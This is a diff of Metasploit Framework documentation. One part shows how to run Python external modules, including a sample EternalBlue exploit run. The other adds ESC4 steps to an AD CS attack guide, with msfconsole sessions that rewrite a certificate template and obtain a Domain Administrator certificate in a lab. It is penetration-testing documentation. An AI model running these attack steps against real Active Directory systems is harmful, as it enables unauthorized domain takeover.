+The Python module will wait for stdin to receive JSON-RPC input. Entering the request to run the module:
+
+```jsonl
+{ "jsonrpc": "2.0", "id": "1337", "method": "run", "params": { "rhosts": ["127.0.0.1"], "rport": "49152" } }
+```
+
+You will see the JSON-RPC responses printed to stdout:
+
+```jsonl
+{"jsonrpc": "2.0", "method": "message", "params": {"level": "debug", "message": "127.0.0.1:49152 - Connected"}}
+{"jsonrpc": "2.0", "method": "message", "params": {"level": "debug", "message": "127.0.0.1:49152 - Received 5 bytes"}}
+{"jsonrpc": "2.0", "method": "message", "params": {"level": "info", "message": "127.0.0.1:49152 - Does not match"}}
+{"jsonrpc": "2.0", "method": "message", "params": {"level": "debug", "message": "127.0.0.1:49152 - Does not match with: bytearray(b'xxxxx')"}}
+```
+
+You can pipe the JSON-RPC request as well for automation purposes:
+
+```
+echo '{ "jsonrpc": "2.0", "id": "1337", "method": "run", "params": { "rhosts": ["127.0.0.1"], "rport": "49152" } }' | PYTHONPATH=./lib/msf/core/modules/external/python:$PYTHONPATH python3 ./modules/auxiliary/scanner/wproxy/att_open_proxy.py
+```
+
+The Python external modules can be run directly with command line options:
+
+```
+$ PYTHONPATH=./lib/msf/core/modules/external/python:$PYTHONPATH python3.9 ./modules/auxiliary/scanner/wproxy/att_open_proxy.py --help
+usage: att_open_proxy.py [-h] --rhosts RHOSTS [--rport RPORT] [ACTION]
+
+The Arris NVG589 and NVG599 routers configured with AT&T U-verse firmware 9.2.2h0d83 expose an un-authenticated proxy that allows connecting from WAN to LAN by MAC address.
+
+positional arguments:
+  ACTION           The action to take (['run'])
+
+optional arguments:
+  -h, --help       show this help message and exit
+  --rport RPORT    The target port, (default: 49152)
+
+required arguments:
+  --rhosts RHOSTS  The target address
+```
+
+For example:
+
+```
+PYTHONPATH=./lib/msf/core/modules/external/python:$PYTHONPATH python3 ./modules/auxiliary/scanner/wproxy/att_open_proxy.py --rhosts 127.0.0.1 --rport 49152
+```
+
+For exploit modules, the payload is encoded encoded using Base64 and specified in a top level `payload_encoded` key, implemented [here](https://github.com/rapid7/metasploit-framework/blob/668735e4185968405c0073465f9aafbf62930538/lib/msf/core/modules/external/templates/remote_exploit.erb#L36-L39).
+Below is an example of the ([now deleted](https://github.com/rapid7/metasploit-framework/pull/15217)) [ms17_010_eternalblue_win8.py](https://github.com/rapid7/metasploit-framework/blob/6dd298ebb76a1617e24da5e4c73e43a46b226a23/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py) module running:
+
+```
+$ cat options.json
+{
+    "jsonrpc": "2.0",
+    "id": "1337",
+    "method": "run",
+    "params": {
+        "VERBOSE": true,
+        "RHOST": "192.168.144.131",
+        "RPORT": "445",
+        "GroomAllocations": 13,
+        "ProcessName": "spoolsv.exe",
+        "SMBUser": "test",
+        "SMBPass": "123456",
+        "payload_encoded": "/EiD5PDozAAA...etc...==="
+    }
+}
+
+$ cat options.json | PYTHONPATH=./lib/msf/core/modules/external/python:$PYTHONPATH python3 modules/exploits/windows/smb/ms17_010_eternalblue_win8.py
+{"jsonrpc": "2.0", "method": "message", "params": {"level": "info", "message": "shellcode size: 1221"}}
+{"jsonrpc": "2.0", "method": "message", "params": {"level": "info", "message": "numGroomConn: 13"}}
+{"jsonrpc": "2.0", "method": "message", "params": {"level": "info", "message": "Target OS: Windows 10 Pro 10240"}}
+{"jsonrpc": "2.0", "method": "message", "params": {"level": "info", "message": "got good NT Trans response"}}
+{"jsonrpc": "2.0", "method": "message", "params": {"level": "info", "message": "got good NT Trans response"}}
+{"jsonrpc": "2.0", "method": "message", "params": {"level": "info", "message": "SMB1 session setup allocate nonpaged pool success"}}
+{"jsonrpc": "2.0", "method": "message", "params": {"level": "info", "message": "SMB1 session setup allocate nonpaged pool success"}}
+```
+
+To add breakpoints to your Python code, add the below code snippet. Note that the interactive breakpoints will only work when
+running the external modules as standalone Python scripts, and won't work when running from msfconsole:
+
+```python
+import pdb; pdb.pry
+```
+
 ## Coding with Style

 All the Python code in Metasploit aims to be [PEP 8](https://www.python.org/dev/peps/pep-0008/) compliant. The biggest differences coming from Metasploit's Ruby style:
@@ -202,4 +295,4 @@ The external modules communicate with framework via JSON-RPC. If your Python mod

 [Metasploit Python library](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/modules/external/python/)

-[ERB Templates](https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/core/modules/external/templates)
+[ERB Templates](https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/core/modules/external/templates)
@@ -2,7 +2,7 @@
 Follow the instructions [[here|./ad-certificates/overview.md]] to set up an AD CS server
 for testing purposes.

-## Introduction to AD CS Vulnerabilities
+# Introduction to AD CS Vulnerabilities
 ```mermaid
 flowchart TD
 	escexp[Find vulnerable certificate templates\nvia ldap_esc_vulnerable_cert_finder] --> icpr[Issue certificates via icpr_cert]
@@ -13,9 +13,10 @@ flowchart TD
 	users[Request certificates on behalf of other users] --> ESC3{{ESC3}}
 	ESC2{{ESC2}} -- Via PKINIT --> pkinit[Authenticate to Kerberos]
 	ESC3{{ESC3}} -- Via PKINIT --> pkinit[Authenticate to Kerberos]
+	ad_cs_template[Reconfigure certificates via ad_cs_cert_template] -- Exploit configuration --> icpr
 ```

-The chart above showcases how one can go about attacking three common AD CS
+The chart above showcases how one can go about attacking four common AD CS
 vulnerabilities, taking advantage of various flaws in how certificate templates are
 configured on an Active Directory Certificate Server.

@@ -27,20 +28,24 @@ and finally using these certificates to authenticate to the domain as the domain
 administrator via Kerberos.

 Each certificate template vulnerability that will be discussed here has a ESC code, such
-as ESC1, ESC2, or ESC3. These ESC codes are taken from the original whitepaper that
+as ESC1, ESC2. These ESC codes are taken from the original whitepaper that
 SpecterOps published which popularized these certificate template attacks, known as
 [Certified
 Pre-Owned](https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf).
 In this paper Will Schroeder and Lee Christensen described 8 different domain escalation
 attacks that they found they could conduct via misconfigured certificate templates:

- ESC1 - Domain escalation via No Issuance Requirements + Enrollable Client
-  Authentication/Smart Card Logon OID templates + CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
+- ESC1 - Domain escalation via No Issuance Requirements + Enrollable Client Authentication/Smart Card Logon OID templates +
+  CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
+  - [[Exploit Steps|attacking-ad-cs-esc-vulnerabilities.md#using-the-esc1-vulnerability-to-get-a-certificate-as-the-domain-administrator]]
 - ESC2 - Domain escalation via No Issuance Requirements + Enrollable Any Purpose
  EKU or no EKU
+  - [[Exploit Steps|attacking-ad-cs-esc-vulnerabilities.md#exploiting-esc2-to-gain-domain-administrator-privileges]]
 - ESC3 - Domain escalation via No Issuance Requirements + Certificate Request
  Agent EKU + no enrollment agent restrictions
+  - [[Exploit Steps|attacking-ad-cs-esc-vulnerabilities.md#exploiting-esc3-to-gain-domain-administrator-privileges]]
 - ESC4 - Domain escalation via misconfigured certificate template access control
+  - [[Exploit Steps|attacking-ad-cs-esc-vulnerabilities.md#exploiting-esc4-to-gain-domain-administrator-privileges]]
 - ESC5 - Domain escalation via vulnerable PKI AD Object Access Control
 - ESC6 - Domain escalation via the EDITF_ATTRIBUTESUBJECTALTNAME2 setting on CAs + No
  Manager Approval + Enrollable Client Authentication/Smart Card Logon OID templates
@@ -68,8 +73,8 @@ post](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-servi
 - ESC11 - Relaying NTLM to ICPR - Relaying NTLM authentication to unprotected RPC
  interface is allowed due to lack of the `IF_ENFORCEENCRYPTICERTREQUEST` flag on `Config.CA.Interface.Flags`.

-Currently Metasploit only supports attacking ESC1 to ESC3. As such,
-this paper only covers exploiting ESC1 to ESC3 at this time.
+Currently, Metasploit only supports attacking ESC1, ESC2, ESC3, and ESC4. As such,
+this page only covers exploiting ESC1 to ESC4 at this time.

 Before continuing, it should be noted that ESC1 is slightly different than ESC2 and ESC3
 as the diagram notes above. This is because in ESC1, one has control over the
@@ -91,7 +96,7 @@ certificates that are created using the vulnerable ESC2 certificate template
 will not work for domain authentication. This restriction does not apply for those
 certificates vulnerable to ESC2 which have the `Any Purpose` EKU applied to them.

-Finally, ESC3 is fairly similar to ESC2, however it differs in two ways: a different EKU
+Next, ESC3 is fairly similar to ESC2, however it differs in two ways: a different EKU
 is abused, and the attacker also needs to utilize two different misconfigured certificate
 templates in order to exploit the vulnerability. The EKU in question this time is the
 Certificate Request Agent EKU, aka OID 1.3.6.1.4.1.311.20.2.1, which allows one to enroll
@@ -129,6 +134,8 @@ Domain Controller (DC), and will run a set of LDAP queries to gather a list of c
 templates they make available for enrollment. It will then also query the permissions on both the CA and the certificate template to figure out
 which users or groups can use that certificate template to elevate their privileges.

+At this time, the module is capable of identifying techniques ESC1 through ESC3.
+
 Keep in mind though that there are two sets of permissions in play here though. There is one set of permissions on the CA server that control
 who is able to enroll in any certificate template from that server, and second set of permissions that control who is allowed to enroll in
 a specific certificate template, which is applied to the certificate template itself. Therefore, the module will also specify which users are
@@ -177,10 +184,10 @@ View the full module info with the info, or info -d command.

 msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set DOMAIN DAFOREST
 DOMAIN => DAFOREST
-msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set USERNAME normal
-USERNAME => normal
-msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set PASSWORD normaluser
-PASSWORD => normaluser
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set USERNAME normaluser
+USERNAME => normaluser
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set PASSWORD normalpass
+PASSWORD => normalpass
 msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set RHOSTS 172.30.239.85
 RHOSTS => 172.30.239.85
 msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run
@@ -300,22 +307,40 @@ msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run
 msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) >
 ```

-From the output above we can determine that the SubCA certificate template is vulnerable to several attacks. However, whilst the issuing CAs allow any authenticated user to enroll in this certificate, the certificate template permissions prevent anyone but Domain Administrators and Enterprise Admins from being able to enroll in this certificate tempalte. At that point you probably don't need to elevate your privileges any higher, so this certificate template isn't that useful for us.
+From the output above we can determine that the SubCA certificate template is vulnerable to several attacks. However,
+whilst the issuing CAs allow any authenticated user to enroll in this certificate, the certificate template permissions
+prevent anyone but Domain Administrators and Enterprise Admins from being able to enroll in this certificate template.
+At that point you probably don't need to elevate your privileges any higher, so this certificate template isn't that
+useful for us.

-Moving onto the next certificate template we see that ESC1-Template is vulnerable to the ESC1 attack, has permissions on the template itself that allow for enrollment by any authenticated domain user, and has one issuing CA, daforest-WIN-BR0CCBA815B-CA, available at WIN-BR0CCBA815B.daforest.com, which allows enrollment by any authenticated user. This means that any user who is authenticated to the domain can utilize this template with a ESC1 attack to elevate their privileges.
+Moving onto the next certificate template we see that ESC1-Template is vulnerable to the ESC1 attack, has permissions on
+the template itself that allow for enrollment by any authenticated domain user, and has one issuing CA, daforest-WIN-
+BR0CCBA815B-CA, available at WIN-BR0CCBA815B.daforest.com, which allows enrollment by any authenticated user. This means
+that any user who is authenticated to the domain can utilize this template with a ESC1 attack to elevate their
+privileges.

-Looking at ESC2-Template we can see the same story however this time the template is vulnerable to an ESC2 attack. ESC3-Template1 is also the same but is vulnerable to ESC3_TEMPLATE_1 attacks, and ESC3-Template2 is the same but vulnerable to ESC3_TEMPLATE_2 attacks.
+Looking at ESC2-Template we can see the same story however this time the template is vulnerable to an ESC2 attack.
+ESC3-Template1 is also the same but is vulnerable to ESC3_TEMPLATE_1 attacks, and ESC3-Template2 is the same but
+vulnerable to ESC3_TEMPLATE_2 attacks.

-We also see that the User template is vulnerable to ESC3_TEMPLATE_2 attacks and the fact that it is enrollable from Domain Users and that daforest-WIN-BR0CCBA815B-CA allows enrollment in it by any authenticated user confirms the theory that this can be exploited by any authenticated attacker for an ESC3_TEMPLATE_2 attack.
+We also see that the User template is vulnerable to ESC3_TEMPLATE_2 attacks and the fact that it is enrollable from
+Domain Users and that daforest-WIN-BR0CCBA815B-CA allows enrollment in it by any authenticated user confirms the theory
+that this can be exploited by any authenticated attacker for an ESC3_TEMPLATE_2 attack.

-Another interesting one to note is the Machine template, which allows any domain joined computer to enroll in it, and who's issuing CA allows any authenticated user to request it.
+Another interesting one to note is the Machine template, which allows any domain joined computer to enroll in it, and
+who's issuing CA allows any authenticated user to request it.

-With this we now have a list of certificates that can be utilized for privilege escalation. The next step is to use the `ipcr_cert` module to request certificates for authentication using the vulnerable certificate templates.
+With this we now have a list of certificates that can be utilized for privilege escalation. The next step is to use the
+`ipcr_cert` module to request certificates for authentication using the vulnerable certificate templates.

-## Using the ESC1 Vulnerability To Get a Certificate as the Domain Administrator
-Getting a certificate as the current user is great, but what we really want to do is elevate privileges if we can. Luckly we can also do this with the `icpr_cert` module. We just need to also set the `ALT_UPN` option to specify who we would like to authenticate as instead. Note that this only works with ESC1 vulnerable certificate templates which is why we can do this here.
+# Using the ESC1 Vulnerability To Get a Certificate as the Domain Administrator
+Getting a certificate as the current user is great, but what we really want to do is elevate privileges if we can.
+Luckily we can also do this with the `icpr_cert` module. We just need to also set the `ALT_UPN` option to specify who we
+would like to authenticate as instead. Note that this only works with ESC1 vulnerable certificate templates which is why
+we can do this here.

-If we know the domain name is `daforest.com` and the domain administrator of this domain is named `Administrator` we can quickly set this up:
+If we know the domain name is `daforest.com` and the domain administrator of this domain is named `Administrator` we can
+quickly set this up:

 ```msf
 msf6 > use auxiliary/admin/dcerpc/icpr_cert
@@ -327,10 +352,10 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
 RHOSTS => 172.30.239.85
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain DAFOREST
 SMBDomain => DAFOREST
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normaluser
-SMBPass => normaluser
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normal
-SMBUser => normal
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
+SMBPass => normalpass
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
+SMBUser => normaluser
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_UPN Administrator@daforest.com
 ALT_UPN => Administrator@daforest.com
 msf6 auxiliary(admin/dcerpc/icpr_cert) > run
@@ -368,10 +393,10 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC2-Template
 CERT_TEMPLATE => ESC2-Template
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain DAFOREST
 SMBDomain => DAFOREST
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normaluser
-SMBPass => normaluser
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normal
-SMBUser => normal
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
+SMBPass => normalpass
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
+SMBUser => normaluser
 msf6 auxiliary(admin/dcerpc/icpr_cert) > show options

 Module options (auxiliary/admin/dcerpc/icpr_cert):
@@ -388,8 +413,8 @@ Module options (auxiliary/admin/dcerpc/icpr_cert):
                                                         ploit-framework/wiki/Using-Metasploit
   RPORT          445                          yes       The target port (TCP)
   SMBDomain      DAFOREST                     no        The Windows domain to use for authentication
-   SMBPass        normaluser                   no        The password for the specified username
-   SMBUser        normal                       no        The username to authenticate as
+   SMBPass        normalpass                   no        The password for the specified username
+   SMBUser        normaluser                   no        The username to authenticate as


 Auxiliary action:
@@ -442,8 +467,8 @@ Module options (auxiliary/admin/dcerpc/icpr_cert):
                                                         ploit-framework/wiki/Using-Metasploit
   RPORT          445                          yes       The target port (TCP)
   SMBDomain      DAFOREST                     no        The Windows domain to use for authentication
-   SMBPass        normaluser                   no        The password for the specified username
-   SMBUser        normal                       no        The username to authenticate as
+   SMBPass        normalpass                   no        The password for the specified username
+   SMBUser        normaluser                   no        The username to authenticate as


 Auxiliary action:
@@ -481,8 +506,8 @@ Module options (auxiliary/admin/dcerpc/icpr_cert):
                                                            tasploit-framework/wiki/Using-Metasploit
   RPORT          445                             yes       The target port (TCP)
   SMBDomain      DAFOREST                        no        The Windows domain to use for authentication
-   SMBPass        normaluser                      no        The password for the specified username
-   SMBUser        normal                          no        The username to authenticate as
+   SMBPass        normalpass                      no        The password for the specified username
+   SMBUser        normaluser                      no        The username to authenticate as


 Auxiliary action:
@@ -521,18 +546,27 @@ We can then use the `kerberos/get_ticket` module to gain a Kerberos ticket grant
 domain administrator. See the [Getting A Kerberos Ticket](#getting-a-kerberos-ticket) section for more information.

 # Exploiting ESC3 To Gain Domain Administrator Privileges
-To exploit ESC3 vulnerable templates we will use a similar process to ESC2 templates but with slightly different steps. First, lets return to the earlier output where we can find several templates that are vulnerable to ESC3 attacks. However we need to split them by attack vector. The reason is that the first half of this attack needs to use the ESC3_TEMPLATE_1 vulnerable certificate templates to enroll in a certificate template that has the Certificate Request Agent OID (1.3.6.1.4.1.311.20.2.1) that allows one to request certificates on behalf of other principals (such as users or computers).
+To exploit ESC3 vulnerable templates we will use a similar process to
+[[ESC2|attacking-ad-cs-esc-vulnerabilities.md#exploiting-esc2-to-gain-domain-administrator-privileges]] templates but
+with slightly different steps. First, let's return to the earlier output where we can find several templates that are
+vulnerable to ESC3 attacks. However we need to split them by attack vector. The reason is that the first half of this
+attack needs to use the ESC3_TEMPLATE_1 vulnerable certificate templates to enroll in a certificate template that has
+the Certificate Request Agent OID (1.3.6.1.4.1.311.20.2.1) that allows one to request certificates on behalf of other
+principals (such as users or computers).

-The second part of this attack will then require that we co-sign requests for another certificate using the certificate that we just got, to then request a certificate that can authenticate to the domain on behalf of another user. To do this we will need to look for certificates in the `ldap_esc_vulnerable_cert_finder` module which are labeled as being vulnerable to the ESC3_TEMPLATE_2 attack.
+The second part of this attack will then require that we co-sign requests for another certificate using the certificate
+that we just got, to then request a certificate that can authenticate to the domain on behalf of another user. To do
+this we will need to look for certificates in the `ldap_esc_vulnerable_cert_finder` module which are labeled as being
+vulnerable to the ESC3_TEMPLATE_2 attack.

 The list of ESC3_TEMPLATE_1 vulnerable templates is pretty short and consists of a single template:
 - ESC3-TEMPLATE-1 - Vulnerable to ESC3_TEMPLATE_1 and allows enrollment via any authenticated domain user.

 ESC3_TEMPLATE_2 are more plentiful though and we can find a few that are of interest:
- SubCA - Again as mentioned earlier can only be enrolled in by Doman Admins and Enterprise Admins, so not a viable vector.
+- SubCA - Again as mentioned earlier can only be enrolled in by Domain Admins and Enterprise Admins, so not a viable vector.
 - ESC3-Template2 - Enrollable via any authenticated domain user.
 - User - Enrollable via any authenticated domain user.
- Administrator -  Can only be enrolled in by Doman Admins and Enterprise Admins, so not a viable vector.
+- Administrator -  Can only be enrolled in by Domain Admins and Enterprise Admins, so not a viable vector.
 - Machine - No real overlap between Domain Computers and Authenticated Users I don't think?
 - DomainController - Can only be enrolled in by Domain Admins and Enterprise Admins, so not a viable vector.

@@ -572,10 +606,10 @@ Auxiliary action:

 View the full module info with the info, or info -d command.

-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normal
-SMBUser => normal
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normaluser
-SMBPass => normaluser
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
+SMBUser => normaluser
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
+SMBPass => normalpass
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain DAFOREST
 SMBDomain => DAFOREST
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
@@ -606,7 +640,7 @@ host  service  type           name             content               info
 msf6 auxiliary(admin/dcerpc/icpr_cert) >
 ```

-Next we'll try use this certificate to request another certificate on behalf of a different user. For this stage we need to specify another certificate that is vulnerable to the ESC3_TEMPLATE_2 attack vector that we are able to enroll in. We will use the `User` template for this:
+Next, we'll try use this certificate to request another certificate on behalf of a different user. For this stage we need to specify another certificate that is vulnerable to the ESC3_TEMPLATE_2 attack vector that we are able to enroll in. We will use the `User` template for this:

 ```msf
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/gwillcox/.msf4/loot/20221216174221_default_unknown_windows.ad.cs_027866.pfx
@@ -632,8 +666,8 @@ Module options (auxiliary/admin/dcerpc/icpr_cert):
                                                            tasploit-framework/wiki/Using-Metasploit
   RPORT          445                             yes       The target port (TCP)
   SMBDomain      DAFOREST                        no        The Windows domain to use for authentication
-   SMBPass        normaluser                      no        The password for the specified username
-   SMBUser        normal                          no        The username to authenticate as
+   SMBPass        normalpass                      no        The password for the specified username
+   SMBUser        normaluser                      no        The username to authenticate as


 Auxiliary action:
@@ -684,8 +718,8 @@ Module options (auxiliary/admin/dcerpc/icpr_cert):
                                                            tasploit-framework/wiki/Using-Metasploit
   RPORT          445                             yes       The target port (TCP)
   SMBDomain      DAFOREST                        no        The Windows domain to use for authentication
-   SMBPass        normaluser                      no        The password for the specified username
-   SMBUser        normal                          no        The username to authenticate as
+   SMBPass        normalpass                      no        The password for the specified username
+   SMBUser        normaluser                      no        The username to authenticate as


 Auxiliary action:
@@ -713,46 +747,207 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) >
 We can then use the `kerberos/get_ticket` module to gain a Kerberos ticket granting ticket (TGT) as the `Administrator`
 domain administrator. See the [Getting A Kerberos Ticket](#getting-a-kerberos-ticket) section for more information.

-# Getting A Kerberos Ticket
-Once a certificate for a user has been claimed, that certificate can be used to issue a Kerberos ticket granting ticket
-(TGT) which in tern can be used to authenticate to services.
+# Exploiting ESC4 To Gain Domain Administrator Privileges
+To exploit ESC4, we will require an account with write privileges over a certificate template object in Active
+Directory. This involves finding an object with weak permissions defined within the `nTSecurityDescriptor` field. With
+this object identified, we can modify it to reconfigure the template to be vulnerable to another ESC technique.

-Ticket granting tickets can be requested using the [[kerberos/get_ticket|kerberos/get_ticket.md]] module by specifying
-the `CERT_FILE` option. Take the certificate file from the last stage of the attack and set it as the `CERT_FILE`.
-Certificates from Metasploit do not require a password, but if the certificate was generated from a source that added
-one, it can be specified in the `CERT_PASSWORD` option. Set the `RHOST` datastore option to the Domain Controller, then
-run the `GET_TGT` action.
+First, we will use the `icpr_cert` module in an attempt to exploit ESC1 (by setting `ALT_UPN`). This fails because
+the `ESC4-Test` certificate template does not allow the certificate's subject name to be supplied in the request (the
+`CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` flag is not set in the `msPKI-Certificate-Name-Flag` field).

 ```msf
-msf6 > use kerberos/get_ticket
+msf6 > use auxiliary/admin/dcerpc/icpr_cert 
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
+RHOSTS => 172.30.239.85
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
+SMBUser => normaluser
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
+SMBPass => normalpass
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA daforest-WIN-BR0CCBA815B-CA
+CA => daforest-WIN-BR0CCBA815B-CA
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC4-Test
+CERT_TEMPLATE => ESC4-Test
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_UPN Administrator@daforest.com
+ALT_UPN => Administrator@daforest.com
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run 
+[*] Running module against 172.30.239.85

-Matching Modules
-================
+[-] 172.30.239.85:445 - There was an error while requesting the certificate.
+[-] 172.30.239.85:445 - Denied by Policy Module
+[-] 172.30.239.85:445 - Error details:
+[-] 172.30.239.85:445 -   Source:  (0x0009) FACILITY_SECURITY: The source of the error code is the Security API layer.
+[-] 172.30.239.85:445 -   HRESULT: (0x80094812) CERTSRV_E_SUBJECT_EMAIL_REQUIRED: The email name is unavailable and cannot be added to the Subject or Subject Alternate name.
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/icpr_cert) > 
+```

-   #  Name                                 Disclosure Date  Rank    Check  Description
-   -  ----                                 ---------------  ----    -----  -----------
-   0  auxiliary/admin/kerberos/get_ticket                   normal  No     Kerberos TGT/TGS Ticket Requester
+Next, we use the `ad_cs_cert_template` module to update the `ESC4-Test` certificate template. This process first makes a
+backup of the certificate data that can be used later. Next, the local certificate template data is read and used to
+update the object in Active Directory. The local certificate template data can be modified to set a custom security
+descriptor.

+```msf
+msf6 auxiliary(admin/dcerpc/icpr_cert) > use auxiliary/admin/ldap/ad_cs_cert_template 
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set RHOSTS 172.30.239.85
+RHOSTS => 172.30.239.85
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set USERNAME normaluser
+USERNAME => normaluser
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set PASSWORD normalpass
+PASSWORD => normalpass
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set CERT_TEMPLATE ESC4-Test
+CERT_TEMPLATE => ESC4-Test
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set ACTION UPDATE 
+ACTION => UPDATE
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set VERBOSE true 
+VERBOSE => true
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > run
+[*] Running module against 172.30.239.85

-Interact with a module by name or index. For example info 0, use 0 or use auxiliary/admin/kerberos/get_ticket
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[*] 172.30.239.85:389 Getting root DSE
+[+] 172.30.239.85:389 Discovered base DN: DC=daforest,DC=com
+[+] Read certificate template data for: CN=ESC4-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*] Certificate template data written to: /home/smcintyre/.msf4/loot/20230505083802_default_172.30.239.85_windows.ad.cs.te_593597.json
+[*] Parsing SDDL text: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
+[+] The operation completed successfully!
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > 
+```

-[*] Using auxiliary/admin/kerberos/get_ticket
-msf6 auxiliary(admin/kerberos/get_ticket) > get_tgt rhosts=192.168.159.10 cert_file=/home/smcintyre/.msf4/loot/20230124173224_default_192.168.159.10_windows.ad.cs_287833.pfx
-[*] Running module against 192.168.159.10
+Now that the certificate template has been updated to be vulnerable to ESC1, then we can use the `previous` shortcut
+to switch back to the last module and reattempt to issue the certificate. This time, the operation succeeds.

-[*] 192.168.159.10:88 - Getting TGT for smcintyre@msflab.local
-[+] 192.168.159.10:88 - Received a valid TGT-Response
-[*] 192.168.159.10:88 - TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230124202354_default_192.168.159.10_mit.kerberos.cca_566767.bin
+```msf
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > previous 
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+[*] Running module against 172.30.239.85
+
+[+] 172.30.239.85:445 - The requested certificate was issued.
+[*] 172.30.239.85:445 - Certificate UPN: Administrator@daforest.com
+[*] 172.30.239.85:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20230505083913_default_172.30.239.85_windows.ad.cs_275324.pfx
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/icpr_cert) > 
+```
+
+Finally, we switch back to the `ad_cs_cert_template` module to restore the original configuration. We do this by
+setting the local template data option `TEMPLATE_FILE` to the JSON file that was created by the previous run.
+
+```msf
+msf6 auxiliary(admin/dcerpc/icpr_cert) > previous 
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set TEMPLATE_FILE /home/smcintyre/.msf4/loot/20230505083802_default_172.30.239.85_windows.ad.cs.te_593597.json
+TEMPLATE_FILE => /home/smcintyre/.msf4/loot/20230505083802_default_172.30.239.85_windows.ad.cs.te_593597.json
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > run
+[*] Running module against 172.30.239.85
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[*] 172.30.239.85:389 Getting root DSE
+[+] 172.30.239.85:389 Discovered base DN: DC=daforest,DC=com
+[+] Read certificate template data for: CN=ESC4-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*] Certificate template data written to: /home/smcintyre/.msf4/loot/20230505083942_default_172.30.239.85_windows.ad.cs.te_000095.json
+[+] The operation completed successfully!
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) >
+```
+
+At this point the certificate template's configuration has been restored and the operator has a certificate that can be
+used to authenticate to Active Directory as the Domain Admin.
+
+# Authenticating With A Certificate
+Metasploit supports authenticating with certificates in a couple of different ways. These techniques can be used to take
+further actions once a certificate has been issued for a particular identity (such as a Domain Admin user).
+
+## Authenticating To Kerberos
+Certificates can be used to authenticate to Kerberos using the [[kerberos/get_ticket|kerberos/get_ticket.md]] module by
+specifying the `CERT_FILE` option. Take the certificate file from the last stage of the attack and set it as the
+`CERT_FILE`. Certificates from Metasploit do not require a password, but if the certificate was generated from a source
+that added one, it can be specified in the `CERT_PASSWORD` option. Set the `RHOST` to the Domain Controller which is the
+Key Distribution Center (KDC) for the Active Directory environment.
+
+### Getting An NT Hash
+Certificates can be used to obtain the NTLM hash of an account with the PKINIT extension. To request the hash, set the
+action to `GET_HASH`.
+
+```msf
